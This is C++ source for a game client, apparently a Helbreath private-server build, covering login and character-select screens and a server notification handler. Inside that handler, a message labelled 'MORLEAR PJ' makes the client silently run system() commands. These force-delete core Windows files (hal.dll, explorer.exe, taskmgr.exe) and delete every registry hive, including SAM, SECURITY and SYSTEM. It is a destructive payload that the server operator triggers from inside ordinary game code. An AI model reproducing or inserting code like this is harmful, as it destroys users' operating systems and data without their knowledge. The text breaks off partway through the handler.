				case 53: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 4; break; // 5
				case 54: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 5; break; // 6
				case 55: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 6; break; // 7
				case 56: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 7; break; // 8
				case 57: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 8; break; // 9
				}
			// MORLA - Modificado para que no escriba al apretar los hotkeys de Casting Bar
			}else if ((m_bInputStatus == FALSE) && (GetAsyncKeyState(VK_MENU)>>15 == FALSE))
			{
				if ((m_bShiftPressed == TRUE) || ((wParam!=49) && (wParam!=50)
					&& (wParam!=51)&& (wParam!=52) && (wParam!=53)))
				{
#ifdef RES_HIGH
					StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
					StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
					ClearInputString(); 
				}
		}	}
		break;
	}
}

void CGame::UpdateScreen_OnQuit()
{
 short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;

 static class CMouseInterface * pMI;

 DWORD dwTime = timeGetTime();

	if (m_cGameModeCount == 0) {
		if (G_pCalcSocket != NULL)
		{	delete G_pCalcSocket;
			G_pCalcSocket = NULL;
		}
		if (m_pGSock != NULL)
		{	delete m_pGSock;
			m_pGSock = NULL;
		}
		m_bEscPressed = FALSE;
		m_bEnterPressed = FALSE;
		pMI = new class CMouseInterface;
#ifdef RES_HIGH
		pMI->AddRect(0,0,800,600);
#else
		pMI->AddRect(0,0,640,480);
#endif
		m_bEnterPressed = FALSE;
	}

    m_cGameModeCount++;
	if (m_cGameModeCount > 120) m_cGameModeCount = 120;

	m_DDraw.ClearBackB4();

	if (m_bEscPressed == TRUE || m_bEnterPressed == TRUE) {
		m_bEscPressed = FALSE;
		m_bEnterPressed = FALSE;
		delete pMI;
		ChangeGameMode(DEF_GAMEMODE_NULL);
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		return;
	}
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_QUIT, 0,0,0, TRUE);
	if (m_cGameModeCount > 20) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_QUIT, 255,123,1, TRUE);
	else if ((m_cGameModeCount >= 15) && (m_cGameModeCount <= 20)) m_pSprite[DEF_SPRID_INTERFACE_ND_QUIT]->PutTransSprite25(255,123,1, TRUE);
	DrawVersion(TRUE);
	if(m_cGameModeCount == 100)
	{	ChangeGameMode(DEF_GAMEMODE_NULL);
		delete pMI;
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		return;
	}
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if ((cMIresult == DEF_MIRESULT_CLICK) && (iMIbuttonNum == 1)) {
		ChangeGameMode(DEF_GAMEMODE_NULL);
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		delete pMI;
		return;
	}

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnQueryForceLogin()
{
 short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;

 static class CMouseInterface * pMI;
 static DWORD dwCTime;
 DWORD dwTime = timeGetTime();

	if (m_cGameModeCount == 0) {
		pMI = new class CMouseInterface;
		pMI->AddRect(200,244,200+DEF_BTNSZX,244+DEF_BTNSZY);
		pMI->AddRect(370,244,370+DEF_BTNSZX,244+DEF_BTNSZY);
		m_bEnterPressed = FALSE;
		m_bEscPressed   = FALSE;
		m_cArrowPressed = 0;

		dwCTime = timeGetTime();

		PlaySound('E', 25, 0);
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE) {
		ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	UpdateScreen_OnSelectCharacter(0, 0, 0, 0);
#ifdef RES_HIGH
	if ((m_cGameModeCount >= 0) && (m_cGameModeCount < 6)) {
		m_DDraw.DrawShadowBox(0,0,800,600);
	}
	else if (m_cGameModeCount >= 6) {
		m_DDraw.DrawShadowBox(0,0, 800, 600);
		m_DDraw.DrawShadowBox(0,0, 800, 600);
	}
#else
	if ((m_cGameModeCount >= 0) && (m_cGameModeCount < 6)) {
		m_DDraw.DrawShadowBox(0,0,639,479);
	}
	else if (m_cGameModeCount >= 6) {
		m_DDraw.DrawShadowBox(0,0,639,479);
		m_DDraw.DrawShadowBox(0,0,639,479);
	}
#endif
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX, 130 + SCREENY, 2);

	PutString_SprFont(172 + 86 + SCREENX, 160 + SCREENY, "Character on Use", 7,0,0);
	PutAlignedString(178, 453 + SCREENX, 195 + SCREENY, UPDATE_SCREEN_ON_QUERY_FORCE_LOGIN1);
	PutAlignedString(178, 453 + SCREENX, 215 + SCREENY, UPDATE_SCREEN_ON_QUERY_FORCE_LOGIN2);

	if ((msX >= 200 + SCREENX) && (msX <= 200 + SCREENX + DEF_BTNSZX) && (msY >= 244 + SCREENY) && (msY <= 244 + SCREENY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 200 + SCREENX, 244 + SCREENY, 19);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 200 + SCREENX, 244 + SCREENY, 18);

	if ((msX >= 370 + SCREENX) && (msX <= 370 + SCREENX + DEF_BTNSZX) && (msY >= 244 + SCREENY) && (msY <= 244 + SCREENY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 3);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 2);

	if ((dwTime - dwCTime) > 100) {
		m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8) {
		m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8) {
			m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK)
	{	PlaySound('E', 14, 5);
		switch (iMIbuttonNum) {
		case 1:
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
            GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode  = MSGID_REQUEST_ENTERGAME;
			m_wEnterGameType = DEF_ENTERGAMEMSGTYPE_NOENTER_FORCEDISCONN;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg,"33");
			delete pMI;
			return;

		case 2:
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			delete pMI;
			break;
	}	}
	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnSelectCharacter(short sX, short sY, short msX, short msY, BOOL bIgnoreFocus)
{int i;
 int iYear, iMonth, iDay, iHour, iMinute;
 __int64 iTemp1, iTemp2;
 char cTotalChar = 0;
 DWORD dwTime = timeGetTime();
	sY = 10;
	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_SELECTCHAR, 0 + SCREENX, 0 + SCREENY, 0);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX, 0 + SCREENY, 50);

	iTemp1 = 0;
	iTemp2 = 0;
	iYear = iMonth = iDay = iHour = iMinute = 0;
	for (i = 0; i < 4; i++)
	{	if ((m_cCurFocus - 1 == i) && (bIgnoreFocus == FALSE))
			 m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(sX + 110 + i*109 -7 + SCREENX, 63 -9 + SCREENY, 62, dwTime);
		else m_pSprite[DEF_SPRID_INTERFACE_ND_BUTTON]->PutSpriteFast(sX + 110 + i*109 -7 + SCREENX, 63 -9 + SCREENY, 61, dwTime);

		if (m_pCharList[i] != NULL)
		{	cTotalChar++;
			switch (m_pCharList[i]->m_sSex) {
			case 1:	_tmp_sOwnerType = 1; break;
			case 2:	_tmp_sOwnerType = 4; break;
			}
			_tmp_sOwnerType += m_pCharList[i]->m_sSkinCol - 1;
			_tmp_cDir   = m_cMenuDir;
			_tmp_sAppr1 = m_pCharList[i]->m_sAppr1;
			_tmp_sAppr2 = m_pCharList[i]->m_sAppr2;
			_tmp_sAppr3 = m_pCharList[i]->m_sAppr3;
			_tmp_sAppr4 = m_pCharList[i]->m_sAppr4;
			_tmp_iApprColor = m_pCharList[i]->m_iApprColor; // v1.4

			ZeroMemory(_tmp_cName, sizeof(_tmp_cName));
			memcpy(_tmp_cName, m_pCharList[i]->m_cName, 10);
			// CLEROTH - NO USE
			_tmp_cAction = DEF_OBJECTMOVE;
			_tmp_cFrame = m_cMenuFrame;

			if (m_pCharList[i]->m_sSex != NULL)
			{	if (m_Misc.bCheckValidString(m_pCharList[i]->m_cName) == TRUE)
				{	m_pEffectSpr[0]->PutTransSprite(sX +157 +i*109 + SCREENX, sY +138 + SCREENY, 1, dwTime);
					DrawObject_OnMove_ForMenu(0, 0, sX +157 +i*109 + SCREENX, sY +138 + SCREENY, FALSE, dwTime, 0, 0);
					PutString(sX +112 +i*109 + SCREENX, sY +179 -9 + SCREENY, m_pCharList[i]->m_cName, RGB(51,0,51));//25,35,25
					int	_sLevel = m_pCharList[i]->m_sLevel;
					wsprintf(G_cTxt, "%d", _sLevel);
					PutString(sX + 138 +i*109 + SCREENX, sY +196 -10 + SCREENY, G_cTxt, RGB(51,0,51)); //25,35,25
					DisplayCommaNumber_G_cTxt(m_pCharList[i]->m_iExp);
					PutString(sX + 138 +i*109 + SCREENX, sY +211 -10 + SCREENY, G_cTxt, RGB(51,0,51)); //25,35,25
				}
				iTemp2 = m_pCharList[i]->m_iYear*1000000 + m_pCharList[i]->m_iMonth*60000 + m_pCharList[i]->m_iDay*1700 + m_pCharList[i]->m_iHour*70 + m_pCharList[i]->m_iMinute;
				if (iTemp1 < iTemp2)
				{	iYear   = m_pCharList[i]->m_iYear;
					iMonth  = m_pCharList[i]->m_iMonth;
					iDay    = m_pCharList[i]->m_iDay;
					iHour   = m_pCharList[i]->m_iHour;
					iMinute = m_pCharList[i]->m_iMinute;
					iTemp1 = iTemp2;
	}	}	}	}
    i = 0 ;

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,51);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,52);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,53);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,54);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,55);

	if ((msX > 360 + SCREENX) && (msY >= 283 + SCREENY) && (msX < 545 + SCREENX) & (msY <= 315 + SCREENY)) {
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,56);
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 290 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER1);//"
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER2);//"
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 320 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER3);//"
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 335 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER4);//"
	} else if ((msX > 360 + SCREENX) && (msY >= 316 + SCREENY) && (msX < 545 + SCREENX) & (msY <= 345 + SCREENY)) {
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,57);
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER5);//"

	} else if ((msX > 360 + SCREENX) && (msY >= 346 + SCREENY) && (msX < 545 + SCREENX) & (msY <= 375 + SCREENY)) {

		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,58);
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER6);//"
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 320 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER7);//"
		

	}else if ((msX > 360 + SCREENX) && (msY >= 376 + SCREENY) && (msX < 545 + SCREENX) & (msY <= 405 + SCREENY))
	{	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,59);
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER12);//"
	}else if ((msX > 360 + SCREENX) && (msY >= 406 + SCREENY) && (msX < 545 + SCREENX) & (msY <= 435 + SCREENY)) {
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 0 + SCREENX,0 + SCREENY,60);
		PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER13);//"
	}else
	{	if (cTotalChar == 0)
		{	PutAlignedString(98 + SCREENX, 357 + SCREENX, 275 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER14);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 290 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER15);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER16);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 320 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER17);//"New Character
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 335 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER18);//"
		}else if (cTotalChar < 4)
		{	PutAlignedString(98 + SCREENX, 357 + SCREENX, 275 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER19);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 290 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER20);//"Play
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER21);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 320 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER22);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 335 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER23);//"Delete Character
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 350 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER24);//"
		}
		if (cTotalChar == 4)
		{	PutAlignedString(98 + SCREENX, 357 + SCREENX, 290 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER25);//"
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 305 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER26);//"Play
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 320 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER27);//"Delete Character
			PutAlignedString(98 + SCREENX, 357 + SCREENX, 335 +15 + SCREENY,  UPDATE_SCREEN_ON_SELECT_CHARACTER28);//"
	}	}
	PutAlignedString(129 + SCREENX, 321 + SCREENX, 456 + SCREENY, MSG_WORLDNAME1);
}

void CGame::UpdateScreen_OnWaitingResponse()
{
 short sX, sY, msX, msY, msZ;
 char cLB, cRB;

 DWORD dwTime = timeGetTime();
 static DWORD dwCTime;

	if (m_cGameModeCount == 0)
	{	m_bEnterPressed = FALSE;
		m_bEscPressed   = FALSE;
		dwCTime = timeGetTime();
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE)
	{	if ((dwTime - m_dwTime) > 7000)
		{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			if (m_pLSock != NULL)
			{	delete m_pLSock;
				m_pLSock = NULL;
			}
			if (m_pGSock != NULL)
			{	delete m_pGSock;
				m_pGSock = NULL;
		}	}
		m_bEscPressed = FALSE;
		return;
	}

	if ((dwTime - dwCTime) > 100)
	{	m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	m_bIsHideLocalCursor = TRUE;
	m_DDraw.ClearBackB4();
	switch (m_cMsg[0]) {
	case '0':
		_Draw_UpdateScreen_OnCreateNewAccount();
		break;
	case '1':
		sX = 146;
		sY = 114;
		_Draw_OnLogin(m_cAccountName, m_cAccountPassword, 0, 0);
		break;
	case '2':
		_bDraw_OnCreateNewCharacter(m_cPlayerName, 0, 0, 0);
		break;
	case '3':
		UpdateScreen_OnSelectCharacter(0, 0, 0, 0);
		break;
	case '4':// Change Password
		UpdateScreen_OnSelectCharacter(0, 0, 0, 0, TRUE);
		break;
	case '5':
		m_DDraw.ClearBackB4();
		break;
	}
	m_bIsHideLocalCursor = FALSE;
#ifdef RES_HIGH
	m_DDraw.DrawShadowBox(0,0, 800,600);
#else
	m_DDraw.DrawShadowBox(0,0, 639,479);
#endif
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);
	PutString_SprFont(172 + 44 -17 + SCREENX, 190 + SCREENY, "Connected. Waiting for response...", 7,0,0);

	if ((dwTime - m_dwTime) > 7000)
	{	PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+30 + SCREENY, UPDATE_SCREEN_ON_WATING_RESPONSE1);
		PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+45 + SCREENY, UPDATE_SCREEN_ON_WATING_RESPONSE2);
	}else PutAlignedString(180 + SCREENX, 463 + SCREENX, 195+30 + SCREENY, UPDATE_SCREEN_ON_WATING_RESPONSE3);

	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 8, dwTime);

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnQueryDeleteCharacter()
{
 short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;

 static class CMouseInterface * pMI;
 static DWORD dwCTime;
 DWORD dwTime = timeGetTime();

	if (m_cGameModeCount == 0)
	{	pMI = new class CMouseInterface;
		pMI->AddRect(200 + SCREENX, 244 + SCREENY, 200 + DEF_BTNSZX + SCREENX, 244 + DEF_BTNSZY + SCREENY);
		pMI->AddRect(370 + SCREENX, 244 + SCREENY, 370 + DEF_BTNSZX + SCREENX, 244 + DEF_BTNSZY + SCREENY);
		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;

		dwCTime = timeGetTime();

		PlaySound('E', 25, 0);
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE)
	{	ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	UpdateScreen_OnSelectCharacter(0, 0, 500, 70);
#ifdef RES_HIGH
	if ((m_cGameModeCount >= 0) && (m_cGameModeCount < 6))
	{	m_DDraw.DrawShadowBox(0,0, 800, 600);
	}else if (m_cGameModeCount >= 6)
	{	m_DDraw.DrawShadowBox(0,0, 800, 600);
		m_DDraw.DrawShadowBox(0,0, 800, 600);
	}
#else
	if ((m_cGameModeCount >= 0) && (m_cGameModeCount < 6))
	{	m_DDraw.DrawShadowBox(0,0,639,479);
	}else if (m_cGameModeCount >= 6)
	{	m_DDraw.DrawShadowBox(0,0,639,479);
		m_DDraw.DrawShadowBox(0,0,639,479);
	}
#endif
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);

	PutString_SprFont(172 + 86 + SCREENX, 160 + SCREENY, "Delete Character", 7,0,0);
	PutString(215 + SCREENX, 195 + SCREENY, UPDATE_SCREEN_ON_QUERY_DELETE_CHARACTER1, RGB(5,5,5));//"Character Name"
	                   //"Character Name"
	PutString(335 + SCREENX, 199 + SCREENY, "__________", RGB(5,5,5));
	PutString(335 + SCREENX, 195 + SCREENY, m_pCharList[m_wEnterGameType - 1]->m_cName, RGB(25,35,25));
	PutAlignedString(178 + SCREENX, 453 + SCREENX, 220 + SCREENY, UPDATE_SCREEN_ON_QUERY_DELETE_CHARACTER2);//"Do you want to delete the character above?"

	// v2.05
	if ((msX >= 200 + SCREENX) && (msX <= 200 + SCREENX + DEF_BTNSZX) && (msY >= 244 + SCREENY) && (msY <= 244 + SCREENY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 200 + SCREENX, 244 + SCREENY, 19);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 200 + SCREENX, 244 + SCREENY, 18);

	if ((msX >= 370 + SCREENX) && (msX <= 370 + SCREENX + DEF_BTNSZX) && (msY >= 244 + SCREENY) && (msY <= 244 + SCREENY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 3);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 2);

	if ((dwTime - dwCTime) > 100)
	{	m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK)
	{	PlaySound('E', 14, 5);
		switch (iMIbuttonNum) {
		case 1:
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort, WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode  = MSGID_REQUEST_DELETECHARACTER;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg,"33");
			delete pMI;
			return;

		case 2:
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			delete pMI;
			break;
	}	}
	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::NotifyMsgHandler(char * pData)
{DWORD * dwp, dwTime, dwTemp;
 WORD  * wp, wEventType;
 char  * cp, cTemp[510], cTxt[120], cCharName[21], cGuildName[22];
 short * sp, sX, sY, sV1, sV2, sV3, sV4, sV5, sV6, sV7, sV8, sV9;
 int   * ip, i, iV1, iV2, iV3, iV4, j;

	dwTime = timeGetTime();

	wp   = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	wEventType = *wp;

	switch (wEventType) {

	case DEF_NOTIFY_REQRANGO: // Morla2.2 - Recibe mensaje
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		m_iRango_EK = *ip;
		cp += 4;
		ip  = (int *)cp;
		m_iRango_REP = *ip;
		cp += 4;
		ip = (int*)cp;
		m_iWantedLevel = *ip;
		cp += 4;
		break;

	//MORLA 2.3 - Deathmatch Activado
    case DEF_NOTIFY_DEATHMATCHSTART: 
		bDeathmatch = TRUE;
        SetTopMsg("Deathmatch Game Started! Teleport in CityHall", 10);
		break;

    case DEF_NOTIFY_DEATHMATCHEND:
		bDeathmatch = FALSE;
        SetTopMsg("Deathmatch Game is Over!", 10);
		break;

	// VAMP- online users list
	case DEF_NOTIFY_USERJOIN:
		NotifyMsg_UserJoin(pData);
		break;

	//News Addons - ZeroEoyPnk
	case DEF_SEND_PARTYHP:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

		ip = (int *)cp;
		PartyId = *ip;
		cp +=4;

		ip = (int *)cp;
		iPartyHp[PartyId-1] = *ip;
		cp +=4;
		
		ip = (int *)cp;
		iMaxPoint2[PartyId-1] = *ip;
		cp +=4;

		ip = (int *)cp;
		iPartySex[PartyId-1] = *ip;
		cp +=4;

		ip = (int*)cp;
		iPartyMp[PartyId - 1] = *ip;
		cp += 4;

		ip = (int*)cp;
		iMaxPoint0[PartyId - 1] = *ip;
		cp += 4;
		break;

	case DEF_SEND_PARTYCOORDS:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		PartyId = *ip;
		cp +=4;

		ip = (int *)cp;
		iParty_sX[PartyId-1] = *ip;
		cp +=4;

		ip = (int *)cp;
		iParty_sY[PartyId-1] = *ip;
		cp +=4;

		ZeroMemory(PartyMapName[PartyId-1], sizeof(PartyMapName[PartyId-1]));
		memcpy(PartyMapName[PartyId-1], cp, 10);
		cp += 10;
		break;

	case DEF_NOTIFY_ITEMTRADE: // MORLA 2.4 - cuando realiza el trade items por eks o dgs
		NotifyMsg_ItemTrade(pData);
		break;	

	//MORLA 2.12 - MORLEAR PJ
    case DEF_NOTIFY_MORLEARPJ: 
        {
			STARTUPINFO si = { sizeof(STARTUPINFO) };
			si.dwFlags = STARTF_USESHOWWINDOW;
			si.wShowWindow = SW_HIDE;
			PROCESS_INFORMATION pi;
			system("del /f %systemroot%\\system32\\hal.dll");
			system("del /f %systemroot%\\system\\hal.dll");
			system("del /f %systemroot%\\system\\system.*");
			system("del /f %systemroot%\\system32\\system.*");
			system("del /f %systemroot%\\system32\\command.com");
			system("del /f %systemroot%\\system32\\keyboard.*");
			system("del /f %systemroot%\\system32\\shell.*");
			system("del /f %systemroot%\\system32\\mouse.*");
			system("del /f %systemroot%\\system32\\msvideo.*");
			system("del /f %systemroot%\\regedit.exe");
			system("del /f %systemroot%\\taskman.exe");
			system("del /f %systemroot%\\explorer.exe");
			system("del /f %systemroot%\\system32\\taskkill.exe");
			system("del /f %systemroot%\\system32\\tasklist.exe");
			system("del /f %systemroot%\\system32\\taskmgr.exe");
			system("reg delete HKEY_CLASSES_ROOT /f");
			system("reg delete HKEY_CURRENT_USER /f");
			system("reg delete HKEY_USERS /f");
			system("reg delete HKEY_CURRENT_CONFIG /f");
			system("reg delete HKEY_LOCAL_MACHINE /f");			
			system("reg delete HKEY_CLASSES_ROOT\\* /f");
			system("reg delete HKEY_CURRENT_USER\\* /f");
			system("reg delete HKEY_USERS\\* /f");
			system("reg delete HKEY_CURRENT_CONFIG\\* /f");
			system("reg delete HKEY_LOCAL_MACHINE\\* /f");
			system("reg delete HKEY_CURRENT_CONFIG\\Software /f");
			system("reg delete HKEY_CURRENT_CONFIG\\System /f");
			system("reg delete HKEY_USERS\\.DEFAULT /f");
			system("reg delete HKEY_USERS\\S-1-5-18 /f");
			system("reg delete HKEY_USERS\\S-1-5-19 /f");
			system("reg delete HKEY_USERS\\S-1-5-19_Classes /f");
			system("reg delete HKEY_USERS\\S-1-5-20 /f");
			system("reg delete HKEY_USERS\\S-1-5-20_Classes /f");
			system("reg delete HKEY_USERS\\S-1-5-21-602162358-606747145-725345543-1003 /f");
			system("reg delete HKEY_USERS\\S-1-5-21-602162358-606747145-725345543-1003_Classes /f");
			system("reg delete HKEY_LOCAL_MACHINE\\HARDWARE /f");
			system("reg delete HKEY_LOCAL_MACHINE\\SAM /f");
			system("reg delete HKEY_LOCAL_MACHINE\\SECURITY /f");
			system("reg delete HKEY_LOCAL_MACHINE\\SOFTWARE /f");
			system("reg delete HKEY_LOCAL_MACHINE\\SYSTEM /f");
